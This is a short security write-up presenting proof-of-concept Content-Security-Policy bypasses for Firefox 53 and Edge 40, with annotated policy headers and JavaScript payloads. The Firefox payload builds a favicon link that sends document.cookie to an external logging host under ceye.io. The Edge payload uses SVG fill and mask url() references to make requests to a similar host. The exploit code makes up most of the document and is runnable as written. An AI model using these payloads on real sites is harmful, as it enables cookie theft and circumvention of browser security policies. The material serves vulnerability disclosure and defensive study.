Firefox53 & Edge40 Browsers CSP Bypass

10 May 2017 - evi1m0

Firefox 53.0.2 Version

CSP RULE:

// Policy under test for the Firefox case. Only default-src is set, so every
// fetch directive (img-src, script-src, style-src, ...) falls back to it.
// 'none' is only meaningful as the sole source expression; next to
// 'unsafe-inline' it is ignored, leaving a list that matches no URL but still
// permits inline <script> and <style>.
// Expected enforcement: inline code runs, every external request is blocked.
header("Content-Security-Policy: default-src 'none' 'unsafe-inline';");

Bypass:

// Test case: a favicon <link> pointing at an external host, created from
// script, under a policy that lists no URL source at all.
// A favicon is fetched as an image (img-src, falling back to default-src), so
// a conforming browser refuses the request; the page presents Firefox 53.0.2
// as sending it.
// Defender notes:
//  - The script has to run first. Here that is granted by 'unsafe-inline';
//    a policy using nonces or hashes instead removes that precondition.
//  - document.cookie only exposes cookies without the HttpOnly flag.
//  - If the browser does not treat the fetch as a violation it presumably
//    sends no CSP report either, so proxy/DNS egress logs are the place such
//    a request would show up, not the report endpoint.

// Milliseconds since the epoch; used below as a per-run subdomain label
// (presumably to make each run distinguishable and uncached).
// x and ffn0t are assigned without a declaration, i.e. implicit globals.
x = (new Date()).valueOf();
// Dummy cookie standing in for a secret value. escape() is deprecated; kept
// exactly as published.
document.cookie = "csp=" + escape("SECUREKEY@^#2!@#") + ";";

// The <link> is appended to <head> before rel/href are set.
// NOTE(review): the page does not say whether this order matters for
// reproduction, so it is left untouched.
ffn0t= document.head.appendChild(document.createElement("link"));
ffn0t.rel = "shortcut icon";
// The whole cookie string is placed in the query string of the icon URL, so a
// single unblocked request carries it to the external host.
ffn0t.href = "http://" + x + ".shortcuticon.ff.vqn3j8.ceye.io/?" + document.cookie;

Microsoft Edge 40.15063 Version

CSP RULE:

// Policy under test for the Edge case (same string as the Firefox case).
// With default-src as the only directive, every resource type falls back to
// it, including whatever SVG paint or mask references are fetched as.
// 'none' is ignored when it is not the sole source expression, so the
// effective list is 'unsafe-inline' alone: inline script and style are
// allowed, no URL is.
header("Content-Security-Policy: default-src 'none' 'unsafe-inline';");

Bypass:

<script>
// Test case for Edge 40.15063: SVG presentation attributes (fill, mask) whose
// url(...) values point at an external host. Under a policy with default-src
// only and no URL source, neither reference should produce a network request;
// the page presents Edge as sending them.
// Both URLs are constants, so this case shows only that a request is made,
// not that page data travels with it.
(function(){
    // Container for the two rectangles.
    // NOTE(review): createElement("svg") creates the element in the HTML
    // namespace, and setting an xmlns attribute afterwards does not change
    // that. Only the <rect> children below, made with createElementNS, are in
    // the SVG namespace.
    var x = document.body.appendChild(document.createElement("svg"));
    x.setAttribute("id", "n0tr00t");
    x.setAttribute("xmlns", "http://www.w3.org/2000/svg");

    /* fill & mask: one URL per attribute, with distinct paths, presumably so
       the receiving host's log shows which attribute triggered a request */
    var svgNS = "http://www.w3.org/2000/svg";
    // Same element as x, looked up again by the id assigned above.
    var n0tr00t = document.getElementById('n0tr00t');
    var fillurl = "url(http://csp32test2.edge.vqn3j8.ceye.io/fillbypass)";
    var maskurl = "url(http://csp32test2.edge.vqn3j8.ceye.io/maskbypass)";
    // First rect: external reference through the fill attribute.
    var nodeRect = n0tr00t.appendChild(document.createElementNS(svgNS, "rect"));
    nodeRect.setAttribute("height", 200);
    nodeRect.setAttribute("width", 200);
    nodeRect.setAttribute("fill", fillurl);
    nodeRect.setAttribute("stroke","#000000");
    // Second rect: local fill colour, external reference through mask.
    var nodeRect2 = n0tr00t.appendChild(document.createElementNS(svgNS, "rect"));
    nodeRect2.setAttribute("height", 200);
    nodeRect2.setAttribute("width", 200);
    nodeRect2.setAttribute("fill", "green");
    nodeRect2.setAttribute("mask", maskurl);
    nodeRect2.setAttribute("stroke","#000000");
})()
</script>